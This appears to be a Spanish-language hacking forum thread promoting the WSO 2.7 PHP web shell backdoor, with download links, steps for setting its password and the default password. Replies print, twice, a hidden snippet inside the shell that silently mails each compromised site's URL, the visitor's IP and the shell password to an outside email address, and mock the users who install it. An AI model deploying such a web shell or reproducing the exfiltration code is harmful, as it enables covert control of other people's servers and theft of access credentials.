WSO es una php shell backdoor que proporciona una interfaz para distintas operaciones remotas, ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.
(http://craven.cu.cc/wp-content/uploads/2013/05/ws0in.png)
con pass simple http://pastebin.com/PMWsW873 (http://pastebin.com/PMWsW873)
pass con error 404 http://pastebin.com/00pLDehv (http://pastebin.com/00pLDehv)
importante cambiar la contraseña de la shell***
1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)
2. buscaremos
$auth_pass = "1846c8d1ead7d12e9f4d18db001ff079″;
lo remplazaremos por nuestra contraseña en MD5 y guardamos
ya que si no quieren cambiar la pass.
la contraseña por defecto es:
hackmeDON
Hay que enseñarles a ofuscar código a estos juakerz
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.7 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hay que enseñarles a ofuscar código a estos juakerz
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.7 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
este es un descarado...... ---->
[email protected] ;D ;D ;D ;D ;D
eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD